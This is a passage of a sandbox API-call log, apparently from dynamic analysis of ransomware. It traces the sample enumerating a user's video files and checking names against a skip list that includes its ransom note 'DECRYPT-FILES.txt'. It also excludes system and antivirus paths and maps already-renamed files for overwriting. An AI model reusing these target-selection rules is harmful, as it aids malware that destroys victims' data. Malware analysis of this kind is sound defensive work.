[0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="DECRYPT-FILES.txt") returned 1 [0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="autorun.inf") returned 1 [0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="boot.ini") returned 1 [0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="desktop.ini") returned 1 [0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="ntuser.dat") returned -1 [0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="iconcache.db") returned -1 [0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="bootsect.bak") returned 1 [0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="ntuser.dat.log") returned -1 [0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="thumbs.db") returned -1 [0186.183] lstrcmpiW (lpString1="fnxRi.avi.F1jPeJ", lpString2="Bootfont.bin") returned 1 [0186.183] lstrlenW (lpString="fnxRi.avi.F1jPeJ") returned 16 [0186.183] lstrcmpiW (lpString1="F1jPeJ", lpString2="lnk") returned -1 [0186.183] lstrcmpiW (lpString1="F1jPeJ", lpString2="exe") returned 1 [0186.183] lstrcmpiW (lpString1="F1jPeJ", lpString2="sys") returned -1 [0186.183] lstrcmpiW (lpString1="F1jPeJ", lpString2="dll") returned 1 [0186.183] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.183] lstrlenW (lpString="fnxRi.avi.F1jPeJ") returned 16 [0186.183] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.183] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="fnxRi.avi.F1jPeJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi.F1jPeJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi.F1jPeJ" [0186.183] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fnxRi.avi.F1jPeJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fnxri.avi.f1jpej"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.184] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=13934) returned 1 [0186.184] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.184] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.185] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.185] CloseHandle (hObject=0x260) returned 1 [0186.185] CloseHandle (hObject=0x25c) returned 1 [0186.185] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.185] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28edaa00, ftCreationTime.dwHighDateTime=0x1d4d593, ftLastAccessTime.dwLowDateTime=0xb0882600, ftLastAccessTime.dwHighDateTime=0x1d4c582, ftLastWriteTime.dwLowDateTime=0xb025ec80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11b2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hpZUuiDNUpxuJrBS.flv.RKvWwHf", cAlternateFileName="HPZUUI~1.RKV")) returned 1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="DECRYPT-FILES.txt") returned 1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="autorun.inf") returned 1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="boot.ini") returned 1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="desktop.ini") returned 1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="ntuser.dat") returned -1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="iconcache.db") returned -1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="bootsect.bak") returned 1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="ntuser.dat.log") returned -1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="thumbs.db") returned -1 [0186.185] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.RKvWwHf", lpString2="Bootfont.bin") returned 1 [0186.185] lstrlenW (lpString="hpZUuiDNUpxuJrBS.flv.RKvWwHf") returned 28 [0186.185] lstrcmpiW (lpString1="RKvWwHf", lpString2="lnk") returned 1 [0186.186] lstrcmpiW (lpString1="RKvWwHf", lpString2="exe") returned 1 [0186.186] lstrcmpiW (lpString1="RKvWwHf", lpString2="sys") returned -1 [0186.186] lstrcmpiW (lpString1="RKvWwHf", lpString2="dll") returned 1 [0186.186] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.186] lstrlenW (lpString="hpZUuiDNUpxuJrBS.flv.RKvWwHf") returned 28 [0186.186] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.186] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="hpZUuiDNUpxuJrBS.flv.RKvWwHf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv.RKvWwHf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv.RKvWwHf" [0186.186] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hpZUuiDNUpxuJrBS.flv.RKvWwHf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hpzuuidnupxujrbs.flv.rkvwwhf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.186] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=72494) returned 1 [0186.186] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.186] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.187] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.187] CloseHandle (hObject=0x260) returned 1 [0186.187] CloseHandle (hObject=0x25c) returned 1 [0186.187] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.187] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf102740, ftCreationTime.dwHighDateTime=0x1d4d176, ftLastAccessTime.dwLowDateTime=0x13b14be0, ftLastAccessTime.dwHighDateTime=0x1d4cd93, ftLastWriteTime.dwLowDateTime=0xb02aaf40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x51a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K-Qq.avi.3oj7", cAlternateFileName="K-QQAV~1.3OJ")) returned 1 [0186.187] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="DECRYPT-FILES.txt") returned 1 [0186.187] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="autorun.inf") returned 1 [0186.187] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="boot.ini") returned 1 [0186.188] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="desktop.ini") returned 1 [0186.188] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="ntuser.dat") returned -1 [0186.188] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="iconcache.db") returned 1 [0186.188] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="bootsect.bak") returned 1 [0186.188] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="ntuser.dat.log") returned -1 [0186.188] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="thumbs.db") returned -1 [0186.188] lstrcmpiW (lpString1="K-Qq.avi.3oj7", lpString2="Bootfont.bin") returned 1 [0186.188] lstrlenW (lpString="K-Qq.avi.3oj7") returned 13 [0186.188] lstrcmpiW (lpString1="3oj7", lpString2="lnk") returned -1 [0186.188] lstrcmpiW (lpString1="3oj7", lpString2="exe") returned -1 [0186.188] lstrcmpiW (lpString1="3oj7", lpString2="sys") returned -1 [0186.188] lstrcmpiW (lpString1="3oj7", lpString2="dll") returned -1 [0186.188] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.188] lstrlenW (lpString="K-Qq.avi.3oj7") returned 13 [0186.188] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.188] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="K-Qq.avi.3oj7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi.3oj7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi.3oj7" [0186.188] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\K-Qq.avi.3oj7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k-qq.avi.3oj7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.188] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=20899) returned 1 [0186.188] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.189] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.189] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.189] CloseHandle (hObject=0x260) returned 1 [0186.189] CloseHandle (hObject=0x25c) returned 1 [0186.189] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.190] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31e5e6f0, ftCreationTime.dwHighDateTime=0x1d4c56b, ftLastAccessTime.dwLowDateTime=0xe11cdea0, ftLastAccessTime.dwHighDateTime=0x1d4c578, ftLastWriteTime.dwLowDateTime=0xb02d10a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x17746, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lk3NhPIapGop5jrw2r.mp4.LRvxp", cAlternateFileName="LK3NHP~1.LRV")) returned 1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="DECRYPT-FILES.txt") returned 1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="autorun.inf") returned 1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="boot.ini") returned 1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="desktop.ini") returned 1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="ntuser.dat") returned -1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="iconcache.db") returned 1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="bootsect.bak") returned 1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="ntuser.dat.log") returned -1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="thumbs.db") returned -1 [0186.190] lstrcmpiW (lpString1="Lk3NhPIapGop5jrw2r.mp4.LRvxp", lpString2="Bootfont.bin") returned 1 [0186.190] lstrlenW (lpString="Lk3NhPIapGop5jrw2r.mp4.LRvxp") returned 28 [0186.190] lstrcmpiW (lpString1="LRvxp", lpString2="lnk") returned 1 [0186.190] lstrcmpiW (lpString1="LRvxp", lpString2="exe") returned 1 [0186.190] lstrcmpiW (lpString1="LRvxp", lpString2="sys") returned -1 [0186.190] lstrcmpiW (lpString1="LRvxp", lpString2="dll") returned 1 [0186.190] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.190] lstrlenW (lpString="Lk3NhPIapGop5jrw2r.mp4.LRvxp") returned 28 [0186.190] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.190] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Lk3NhPIapGop5jrw2r.mp4.LRvxp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4.LRvxp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4.LRvxp" [0186.190] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4.LRvxp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lk3nhpiapgop5jrw2r.mp4.lrvxp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.191] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=96070) returned 1 [0186.191] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.191] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.191] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.191] CloseHandle (hObject=0x260) returned 1 [0186.192] CloseHandle (hObject=0x25c) returned 1 [0186.192] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.192] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8dc74a80, ftCreationTime.dwHighDateTime=0x1d4c864, ftLastAccessTime.dwLowDateTime=0xb07dff60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb07dff60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ne-e0BIC1cg5IRWK", cAlternateFileName="NE-E0B~1")) returned 1 [0186.192] lstrcmpW (lpString1="ne-e0BIC1cg5IRWK", lpString2=".") returned 1 [0186.192] lstrcmpW (lpString1="ne-e0BIC1cg5IRWK", lpString2="..") returned 1 [0186.192] lstrcatW (in: lpString1="ne-e0BIC1cg5IRWK", lpString2="\\" | out: lpString1="ne-e0BIC1cg5IRWK\\") returned="ne-e0BIC1cg5IRWK\\" [0186.192] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Program Files") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch=":\\Windows") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Games\\") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\All Users") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="AhnLab") returned 0x0 [0186.192] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.192] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.192] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.192] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\\\0a16c9.tmp") returned 65 [0186.193] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0186.195] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.195] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.195] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\\\DECRYPT-FILES.txt") returned 72 [0186.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.196] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.196] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\*" [0186.196] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8dc74a80, ftCreationTime.dwHighDateTime=0x1d4c864, ftLastAccessTime.dwLowDateTime=0xf1ae8900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1ae8900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.196] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.196] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8dc74a80, ftCreationTime.dwHighDateTime=0x1d4c864, ftLastAccessTime.dwLowDateTime=0xf1ae8900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1ae8900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.197] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.197] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.197] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ae8900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1ae8900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1ae8900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.197] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.197] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.197] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.197] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.197] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.197] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.197] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.197] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.197] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.197] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0a16c9.tmp" [0186.197] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.198] CloseHandle (hObject=0x0) returned 0 [0186.198] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.198] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3205a20, ftCreationTime.dwHighDateTime=0x1d4c554, ftLastAccessTime.dwLowDateTime=0x34740ea0, ftLastAccessTime.dwHighDateTime=0x1d4c5e9, ftLastWriteTime.dwLowDateTime=0xb031d360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd220, dwReserved0=0x0, dwReserved1=0x0, 